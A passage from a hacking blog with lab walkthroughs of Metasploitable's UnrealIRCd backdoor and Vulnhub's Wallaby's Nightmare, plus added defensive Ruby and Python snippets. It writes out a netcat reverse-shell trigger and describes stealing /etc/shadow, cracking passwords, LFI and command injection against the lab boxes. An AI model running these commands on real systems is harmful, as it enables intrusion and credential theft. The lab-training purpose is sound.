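  if front.private_methods.include?(msg_id) || front.protected_methods.include?(msg_id)
    raise NoMethodError, "non-public method `#{msg_id}' refused"
  end
  front.__send__(msg_id, *argv)
end

# true when a remote peer could get msg_id executed on this front object.
def remotely_callable?(front, msg_id, *argv)
  drb_dispatch(front, msg_id, *argv)
  true
rescue NoMethodError, SecurityError
  false
end

if $PROGRAM_NAME == __FILE__
  fronts = { 'naive' => NaiveFront.new, 'restricted' => RestrictedFront.new(StatusService.new) }
  fronts.each do |label, front|
    [[:ping], [:instance_eval, '1 + 1'], [:send, :ping]].each do |msg|
      puts format('%-10s %-14s %s', label, msg.first, remotely_callable?(front, *msg))
    end
  end
end
```

An allow-list does not stop the network from reaching the port, so in practice you would also bind the service to a loopback or restricted address and install a DRb ACL.<br />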
<br />
Next, let's do another metasploit one. We saw in our nmap scan that there was an UnrealIRCd service running and metasploit definitely has a module for this. Let's find it...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauPmpIoe389UlEfu0jzx1pRuC2cnm-pvK6SvKWPUMcwDEVP2WskxOXYbcQ7ErVDRQKAxXYMgwg4O7VJ_P0T5dEND4YDxp6STssgYihudI9di4a5OSgutoo0lChmBEafdB7_DNaujcMHdv/s1600/38_unrealirc_backdoor_msfconsole_search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauPmpIoe389UlEfu0jzx1pRuC2cnm-pvK6SvKWPUMcwDEVP2WskxOXYbcQ7ErVDRQKAxXYMgwg4O7VJ_P0T5dEND4YDxp6STssgYihudI9di4a5OSgutoo0lChmBEafdB7_DNaujcMHdv/s320/38_unrealirc_backdoor_msfconsole_search.png" width="320" /></a></div>
<br />
There it is! Let's set it up...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifogc-sdcY11cJDlbbLzkeS0U_9vMzo57PuEtpmxWn39vTJyzytvibO_-3Vq0GutbcUrbIp53F69dB9flTALxse7YyyuCmRYUVQpYJl7g0r1xBeQJbi7u3Hd7SsAfn5TroTD_Yjr6H8-sa/s1600/39_show_options_unrealirc_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifogc-sdcY11cJDlbbLzkeS0U_9vMzo57PuEtpmxWn39vTJyzytvibO_-3Vq0GutbcUrbIp53F69dB9flTALxse7YyyuCmRYUVQpYJl7g0r1xBeQJbi7u3Hd7SsAfn5TroTD_Yjr6H8-sa/s320/39_show_options_unrealirc_exploit.png" width="320" /></a></div>
<br />
<br />
And FIRE!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGoQfqkYB-kk99JEL9wRMRv8BoGiab_G8aKyuXGiuntsgsnKXPfZrX_wWpG1qmtMSzqjnRl-0MDF0CPzx2jx3mb6m9S-Nzk5qChnL3IYQAvIA6zLoeJv12h3AWTiL3Z7o_no7S6W8iKNX/s1600/40_exploit_to_root_unrealircd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGoQfqkYB-kk99JEL9wRMRv8BoGiab_G8aKyuXGiuntsgsnKXPfZrX_wWpG1qmtMSzqjnRl-0MDF0CPzx2jx3mb6m9S-Nzk5qChnL3IYQAvIA6zLoeJv12h3AWTiL3Z7o_no7S6W8iKNX/s320/40_exploit_to_root_unrealircd.png" width="320" /></a></div>
<br />
See how easy that was? Metasploit can make exploitation trivial, but why did that actually work? As you might have seen, this was a backdoor placed into the code, much like the first vsftpd service we exploited. The vulnerable versions can be triggered with AB;&lt;system command&gt;, so let's try this manually, because we should not always rely on metasploit. For our first attempt, we netcat over to the service and try activating the backdoor by hand.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgShfaJQIKsF5xHvEb3pP1eca_Pqh4csKDfhqHuPdsUZ-ztR8HvEJdZ-vsMODh3bZyZoaTW08eYpoYBelYys7DkRPpsi_j0LqmmFCy_tKW18rv-gOtaTsc3Vm-EPTPtrfCoXtAMlNwrF-rX/s1600/41_manual_unreal_not_working.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgShfaJQIKsF5xHvEb3pP1eca_Pqh4csKDfhqHuPdsUZ-ztR8HvEJdZ-vsMODh3bZyZoaTW08eYpoYBelYys7DkRPpsi_j0LqmmFCy_tKW18rv-gOtaTsc3Vm-EPTPtrfCoXtAMlNwrF-rX/s320/41_manual_unreal_not_working.png" width="320" /></a></div>
<br />
Nothing is happening. However, we know this vulnerability exists because we just exploited it with metasploit. What's going on? After I looked at the source code and didn't find anything else helpful, I realized that maybe it really is working but we just don't see the output. We can test this by having it request a webpage from our web server. As you'll see, this works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwDi6A-E-Ogd8G4-VccjtYRuQshNO499jjW1SUUmiTB-qnxDf1u_XBXDMEUrgPgqR5zdTCuocDyP0KCsfaCMnt4DHRS3RD_WPWhWE7UQ6ITJnaPVV5kYbJc149hZ9Mw-ddO3NX9qaou8Tw/s1600/42_doesnotexist_html_proof_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwDi6A-E-Ogd8G4-VccjtYRuQshNO499jjW1SUUmiTB-qnxDf1u_XBXDMEUrgPgqR5zdTCuocDyP0KCsfaCMnt4DHRS3RD_WPWhWE7UQ6ITJnaPVV5kYbJc149hZ9Mw-ddO3NX9qaou8Tw/s320/42_doesnotexist_html_proof_execution.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mFc9O8l0npOQUbZVY2xsMNl3JsfQT7caVQffDunk_8Xq4RvJOyJIeh82uU45OZ2FDfgsFZgbn73AeANLsIQGSrXAnl8bpWxWdFj-MJn-WMiov76b1oZb8shQgkbekwusIGD2psQ8U1n5/s1600/43_see_html_request_proof_code_exec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mFc9O8l0npOQUbZVY2xsMNl3JsfQT7caVQffDunk_8Xq4RvJOyJIeh82uU45OZ2FDfgsFZgbn73AeANLsIQGSrXAnl8bpWxWdFj-MJn-WMiov76b1oZb8shQgkbekwusIGD2psQ8U1n5/s320/43_see_html_request_proof_code_exec.png" width="320" /></a></div>
<br />
Ahhhh, all is right with the world. Let's use it to quickly get a shell using netcat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXT3xVJm8a1zVmgZAsBMyEbp_h-Owkak_0Tx92ReyVXLGajc2SL06cwjS3tSdaCEg4FJsipbev4LTd_Gt0Wi5SXLbQeBWAdLD9SSp6_HvxH0uNsrcOzobXykK3FK3-uFKLCDtcxQu63Hb/s1600/44_shell_with_manual_unrealirc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXT3xVJm8a1zVmgZAsBMyEbp_h-Owkak_0Tx92ReyVXLGajc2SL06cwjS3tSdaCEg4FJsipbev4LTd_Gt0Wi5SXLbQeBWAdLD9SSp6_HvxH0uNsrcOzobXykK3FK3-uFKLCDtcxQu63Hb/s320/44_shell_with_manual_unrealirc.png" width="320" /></a></div>
<br />
Awesome! We can exploit this vulnerability using nc as well as metasploit. I don't show the nc command used, but it was "AB; nc -e /bin/bash 10.0.0.18 1234": AB; triggers the backdoor, -e gives us a shell on the remote host when it calls back to us, and 10.0.0.18 is my local IP address on my LAN.<br />
<br />
As you can see, there are so many ways to practice using your tools and skills to break into this hyper-vulnerable machine. Next, we're going to show a vulnerability that is more prevalent than ANY OTHER and is probably more widely exploited than any other. It's the weak password.<br />
<br />
Let's show how easy some of these passwords can be cracked.<br />
<br />
When cracking passwords from a Linux system, there are two files that need to be grabbed: /etc/passwd and /etc/shadow. We were able to get these files using any of the previous exploits that got us root permissions. First, we need to format them for John the Ripper, our password cracker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRFLBJ8Il1Mc4cQpt3HxuaRXazYYWajMqUrFjYz5L8PEeTY_trnq70WQJdnzUkqpGdiCxQnQmU7i-Q-35gaVkSKKqZguy0L5_aYxn3pw3_IPtwu4ugHdw5Sqdw8nb4x3s0uiKNutRIWo3/s1600/45_etc_passwd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRFLBJ8Il1Mc4cQpt3HxuaRXazYYWajMqUrFjYz5L8PEeTY_trnq70WQJdnzUkqpGdiCxQnQmU7i-Q-35gaVkSKKqZguy0L5_aYxn3pw3_IPtwu4ugHdw5Sqdw8nb4x3s0uiKNutRIWo3/s320/45_etc_passwd.png" width="320" /></a></div>
<br />
Here is the /etc/passwd file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrEm8N0oLfKemDqMXogkgLcNUGe9gdIujlScup-yxrsZEDWitWEq7ohscgTu8W2BwZMqYc-3uZkgp7WVdZ01cmcDRc1XHqwGyDzhnd5zCqvYVL81CAsvery4CE1NrFpTFn8puJ2dZYWlJ1/s1600/46_etc_shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrEm8N0oLfKemDqMXogkgLcNUGe9gdIujlScup-yxrsZEDWitWEq7ohscgTu8W2BwZMqYc-3uZkgp7WVdZ01cmcDRc1XHqwGyDzhnd5zCqvYVL81CAsvery4CE1NrFpTFn8puJ2dZYWlJ1/s320/46_etc_shadow.png" width="320" /></a></div>
<br />
Here is the /etc/shadow file. We can then combine the two using the unshadow tool...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjbjWLPLq9lPXtQ8PVtePQo66wS0xVVqA3360-itfS4FY_XZpMFf3rh3Iiu_uK55-ELd458KlPMMw_Lh9h_qwVi6ORXLoVOutyJwSZFPMEz4UpZHAPISN_qfWaluPAncSfy1pZ42SkCBBc/s1600/47_metasploitable_crackme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjbjWLPLq9lPXtQ8PVtePQo66wS0xVVqA3360-itfS4FY_XZpMFf3rh3Iiu_uK55-ELd458KlPMMw_Lh9h_qwVi6ORXLoVOutyJwSZFPMEz4UpZHAPISN_qfWaluPAncSfy1pZ42SkCBBc/s320/47_metasploitable_crackme.png" width="320" /></a></div>
<br />
The first six passwords were cracked in a few seconds; the root password required more brute forcing. I stopped it after a few million guesses because, if we wanted to, we could simply change the root password with our root permissions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho_b49E5AZ2eK0QqDHHNWk0YC-Y9snY2KKeQG9EB2S5WjGojdA01qpIAfaMxsPIRpaFRfTBJ2FIGZ3yoWvCVcECU95zzo3MklBCpIg4QG4zABbDjS6PMs-hLSvsEJCP6DtPDLKgxGnaGFj/s1600/48_cracked_passwords.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho_b49E5AZ2eK0QqDHHNWk0YC-Y9snY2KKeQG9EB2S5WjGojdA01qpIAfaMxsPIRpaFRfTBJ2FIGZ3yoWvCVcECU95zzo3MklBCpIg4QG4zABbDjS6PMs-hLSvsEJCP6DtPDLKgxGnaGFj/s320/48_cracked_passwords.png" width="320" /></a></div>
<br />
This is why password cracking can be so powerful. If the password is not complex, there are lists of compromised passwords, commonly used passwords, common dictionary words, and hybrid words with numbers and symbols, so even moderately complex passwords can be cracked by pure brute force.<br />
<br />
Well that's all for this post! Hack Responsibly, Hack Professionally.<br />
<br />Austin (http://www.blogger.com/profile/01968094133955654942), 2017-02-25: Nightmare on Wallaby Street - Vulnhub Walkthrough<br />
<br />
Here we are again doing some Friday night hacking! I haven't posted in a while (been crazy busy) so I wanted to unwind and relax with a good vulnhub box. I decided I'd work on Wallaby's: Nightmare. Let's dive right in.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQYrukn1jSyvTQF8AfBYUiTUVWskk_QkLkFhlino5E-RXPbOaGQ48-RMUtauP3Wy3xCKI5cLJDSaQ2PkzrOiAV2-00sIaG67yahHjcywULF4ezY8tOeQ90CWzXbKenAO2-7mc4OJmzPqi6/s1600/first_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQYrukn1jSyvTQF8AfBYUiTUVWskk_QkLkFhlino5E-RXPbOaGQ48-RMUtauP3Wy3xCKI5cLJDSaQ2PkzrOiAV2-00sIaG67yahHjcywULF4ezY8tOeQ90CWzXbKenAO2-7mc4OJmzPqi6/s320/first_webpage.png" width="320" /></a></div>
<br />
This is the first page you see on the web server. Is this part of the CTF?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjODH-E7qfD2j7mNIz1P-nVdubF6bDPjTB28h9FyWN-wfwYynbRT0PEkuZHYKesiqLiBP7WOnjGH2Kl-PSRWPX-oqMXBeZ3WeonP2y2lxCXmK5tLI9jNW724VSxEPxHOFuI4FpgLAI8FFLA/s1600/enter_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjODH-E7qfD2j7mNIz1P-nVdubF6bDPjTB28h9FyWN-wfwYynbRT0PEkuZHYKesiqLiBP7WOnjGH2Kl-PSRWPX-oqMXBeZ3WeonP2y2lxCXmK5tLI9jNW724VSxEPxHOFuI4FpgLAI8FFLA/s320/enter_username.png" width="320" /></a></div>
<br />
I decided to enter my name and see what happens...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYQEqbuRZCXCWfoSMQGI-ISolypDSVCRFo5xO-1sAn80Bb4BLAqqccMUsncOzYGkgw49u-U3XUHyn73VPOaWR1eglROmsaNaxJwoVf1t960Ow4iwxCVgQE5OMblr3bHnQX5OL8YbDg1_H1/s1600/starting_ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYQEqbuRZCXCWfoSMQGI-ISolypDSVCRFo5xO-1sAn80Bb4BLAqqccMUsncOzYGkgw49u-U3XUHyn73VPOaWR1eglROmsaNaxJwoVf1t960Ow4iwxCVgQE5OMblr3bHnQX5OL8YbDg1_H1/s320/starting_ctf.png" width="320" /></a></div>
<br />
Alright, well, looking at the top of the page, it looks like it could have an LFI vulnerability. So, let's check...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGfYdrJ0R0r6d0a9LolUqLmS7MXfxjGV2mIQ9r1QSG34gkn35I3MNUCh94V1rWq1zz9OewJY_uAIL53FG4HDGq_Bqw42cbNnKXcKEUR3lbv9xzQZu3dOvaftRshk2VlMb8w3IrKByqQp6/s1600/local_file_inclusion_vuln.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGfYdrJ0R0r6d0a9LolUqLmS7MXfxjGV2mIQ9r1QSG34gkn35I3MNUCh94V1rWq1zz9OewJY_uAIL53FG4HDGq_Bqw42cbNnKXcKEUR3lbv9xzQZu3dOvaftRshk2VlMb8w3IrKByqQp6/s320/local_file_inclusion_vuln.png" width="320" /></a></div>
<br />
Yup, it definitely does, we can get /etc/passwd... can we get /etc/shadow?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbmzowpTpOHXnPNH2LgKn6CY2aNpGjdSzO-V4EKNsTp8IuJgJl54X7rymEzvKgyn7Mvo_3Egg13zJo1D4pivP_OVplwFj-8GUMp0nNCJVje70iBcE80cQy0NM5A1joj3ugmFQDmkmWeP0v/s1600/got_caught.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbmzowpTpOHXnPNH2LgKn6CY2aNpGjdSzO-V4EKNsTp8IuJgJl54X7rymEzvKgyn7Mvo_3Egg13zJo1D4pivP_OVplwFj-8GUMp0nNCJVje70iBcE80cQy0NM5A1joj3ugmFQDmkmWeP0v/s320/got_caught.png" width="320" /></a></div>
<br />
DAMMIT. Ok, well...onto the next steps...Let's check the network scan again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxfWzHnNDgLgkW6RGVR2Rw1WTe7Cg8E7Ys0Vvk3H05CXq0FrOZRUz5b6kzRcJ-NGPyp72dwF6QpDmduLqxbCDx77JxryiSQpbLeyOq7-djN5J9J1PKa0g2pZPti0zwHJKbZTUCfrgYZzP/s1600/found_new_webserver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxfWzHnNDgLgkW6RGVR2Rw1WTe7Cg8E7Ys0Vvk3H05CXq0FrOZRUz5b6kzRcJ-NGPyp72dwF6QpDmduLqxbCDx77JxryiSQpbLeyOq7-djN5J9J1PKa0g2pZPti0zwHJKbZTUCfrgYZzP/s320/found_new_webserver.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Looks like there is an open TCP port on 60080 (possibly HTTP, since it ends in 80?). As you can see above, based on poorly timed screenshots on my part, we found the new web server.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTcLqyfxA0A7RuMlqnAVsqGmMuvPTXGNM7I1Gtho_vzjz8utLIAfwwTDXs1EZJ7RZw0HtRvu0BOfFSGE19jJqBtjkXSTh1WMJa4TQKTZznMgpTWdCoHY0a0YVyHs8fyZay-xCo1YFrSYI/s1600/new_webserver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTcLqyfxA0A7RuMlqnAVsqGmMuvPTXGNM7I1Gtho_vzjz8utLIAfwwTDXs1EZJ7RZw0HtRvu0BOfFSGE19jJqBtjkXSTh1WMJa4TQKTZznMgpTWdCoHY0a0YVyHs8fyZay-xCo1YFrSYI/s320/new_webserver.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After running dirbuster and getting nothing, I tried the same path as on the previous web server and look! The same LFI vulnerability exists here too!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKQPZLS1msitxpHP-vk1AayqrePZyJLMxSF9-BRNb8PWHC6IWnsCGHW1D1vweLUXJeDnqXq3-MvCEXTd46bUleKkEMHantSq0HcbaC94rwSUHMZR8LPTSCDyRnZEJ6rwKWblyLpmosWWAC/s1600/another_lfi_vuln.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKQPZLS1msitxpHP-vk1AayqrePZyJLMxSF9-BRNb8PWHC6IWnsCGHW1D1vweLUXJeDnqXq3-MvCEXTd46bUleKkEMHantSq0HcbaC94rwSUHMZR8LPTSCDyRnZEJ6rwKWblyLpmosWWAC/s320/another_lfi_vuln.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Let's poke around the system and see what we can find... lol... I got banned.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Y6TFIznDWMfc8_AE-Y9AhGwoEUTDbg11_4XpPbx_RnIIjcSs6QudzgsYSciTT1WcOxQvPb7LMkjCCdgNRLdRjoYKAM9cNOHYW2N_6DAohbzWzLVUlClNsXayi7ZQpoU6b9W9dAVC7Rjv/s1600/got_banned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Y6TFIznDWMfc8_AE-Y9AhGwoEUTDbg11_4XpPbx_RnIIjcSs6QudzgsYSciTT1WcOxQvPb7LMkjCCdgNRLdRjoYKAM9cNOHYW2N_6DAohbzWzLVUlClNsXayi7ZQpoU6b9W9dAVC7Rjv/s320/got_banned.png" width="320" /></a></div>
<br />
<br />
So, now it's time to brute force this page parameter. I decided to use dirb, and the syntax was super nice. The command I ran was: "dirb http://192.168.6.140:60080/?page= /usr/share/dirb/wordlists/big.txt" (no quotes). dirb appends each wordlist entry to the URL you give it, so handing it a URL that ends in ?page= fuzzes the parameter value rather than the path. It returned the following pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuagw9QZQTFUqoA7IJ3UwvWdLfdPp5pBOj8VyL_LPsxTV-Rs6pedB61WXIxJluSCl6m0whGGppHrXgXcbT7LMDr3YtcThm2yI-cHywqfpgBQRZjxcQXZUvvXZ0yZ-oM-OygDTVQwl-GDP/s1600/dirb_finds_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuagw9QZQTFUqoA7IJ3UwvWdLfdPp5pBOj8VyL_LPsxTV-Rs6pedB61WXIxJluSCl6m0whGGppHrXgXcbT7LMDr3YtcThm2yI-cHywqfpgBQRZjxcQXZUvvXZ0yZ-oM-OygDTVQwl-GDP/s320/dirb_finds_param.png" width="320" /></a></div>
<br />
And now we check them out! The contact page gives us a fake email address, home and index both return the same home page, cgi-bin/ didn't work, and blacklist is the banned page I showed you earlier. The mailer page does seem to hold some valuable information though (in the HTML comments).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipwsO2mQTIoVSN3SnpNJPJ7qZyAg8rESASXc9Ttbj5xmTIOSPieB9kPRYfhCwMqfbqjo2vpA08TSzcB0f7n7JEwkTvbpKvFpljIFEf_ePZjlNBxWeY8b4DfJq_g1McXEefBeMVKgYGHDWR/s1600/found_mailer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipwsO2mQTIoVSN3SnpNJPJ7qZyAg8rESASXc9Ttbj5xmTIOSPieB9kPRYfhCwMqfbqjo2vpA08TSzcB0f7n7JEwkTvbpKvFpljIFEf_ePZjlNBxWeY8b4DfJq_g1McXEefBeMVKgYGHDWR/s320/found_mailer.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipgAI8hcpQsit8ldb-EszHGE8WeRPnU51yYjcFfoc7qG0Ir7jtTahd9BgWp3GBrVc786BRYHjem1FnqiLKToOn-P5D1J1QupuqvYBEQftT-pDwmtY6ayFuTyu6iH76GbZU5UawARZwsOdT/s1600/mailer_source_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipgAI8hcpQsit8ldb-EszHGE8WeRPnU51yYjcFfoc7qG0Ir7jtTahd9BgWp3GBrVc786BRYHjem1FnqiLKToOn-P5D1J1QupuqvYBEQftT-pDwmtY6ayFuTyu6iH76GbZU5UawARZwsOdT/s320/mailer_source_code.png" width="320" /></a></div>
<br />
Let's try the parameters from the HTML comment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXCPNSqAyO0yPaMFQD_GRD3DuSdK9XuK4LiWpTpzdbjw7warvdxHmS7bqUpyj4j94EbhBAqJzVsApjsHN2jLhgmHhWDmGzl7PYSRBGeQ6dnkdPmHMNU13SP2cHusHaWPA9wOCN0IksHoF/s1600/mail_parameter_use1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXCPNSqAyO0yPaMFQD_GRD3DuSdK9XuK4LiWpTpzdbjw7warvdxHmS7bqUpyj4j94EbhBAqJzVsApjsHN2jLhgmHhWDmGzl7PYSRBGeQ6dnkdPmHMNU13SP2cHusHaWPA9wOCN0IksHoF/s320/mail_parameter_use1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuW16XMox-xiHoikWb56jtKMr719w76ezJuq_klnQcMVaudkc3iNcPeePNHtSPb_oskl5Hg5C0tek2-TKpyZyYEEKLvkWJ4_VIJDVSDBaMolLhm1HM2S3ODIrBmHdQvx-JLC5CKR7c2ixY/s1600/mail_parameter_use2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuW16XMox-xiHoikWb56jtKMr719w76ezJuq_klnQcMVaudkc3iNcPeePNHtSPb_oskl5Hg5C0tek2-TKpyZyYEEKLvkWJ4_VIJDVSDBaMolLhm1HM2S3ODIrBmHdQvx-JLC5CKR7c2ixY/s320/mail_parameter_use2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2_uOBpy-4yGR6WyH7mvfZIvfxbNEt5MTM8eqn6CsSJneb19f1buFNKQgisoAs5iIi6oCwCo0LcDsQB7SeYq9JOsDuvu4VHrBpk_iSe4HFZe2JlsTmjLwBzkqpEbXA0h0HVkYZHCESV_4W/s1600/command_injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2_uOBpy-4yGR6WyH7mvfZIvfxbNEt5MTM8eqn6CsSJneb19f1buFNKQgisoAs5iIi6oCwCo0LcDsQB7SeYq9JOsDuvu4VHrBpk_iSe4HFZe2JlsTmjLwBzkqpEbXA0h0HVkYZHCESV_4W/s320/command_injection.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Oh, hello there, command injection! I messed around with the mail &lt;name&gt; "test" input, tried LFI (not seen above), and finally tried command injection, and it worked. Let's use this to get a shell on the box. Using the PHP reverse shell provided by pentestmonkey that ships with Kali (/usr/share/webshells/php/php-reverse-shell.php), I was able to get a limited-privilege shell on the target as www-data.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
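Both bugs found so far, the LFI in the page parameter and the command injection in the mailer form, leave an obvious signature in the web server's access log, which is the flip side of this walkthrough: how a defender would have spotted it. The following is an added example, not code from the original post and not anything from the box: a small scanner that runs over a few constructed Apache-style access log lines and flags request parameters carrying path-traversal sequences, PHP stream wrappers, or shell metacharacters. The log lines, client addresses and timestamps are made up for the illustration.<br />

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Apache combined format). These lines are made
# up to mirror the requests made in this walkthrough; they are not real traffic
# from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Mar/2018:16:01:02 -0400] "GET /?page=home HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Mar/2018:16:01:09 -0400] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
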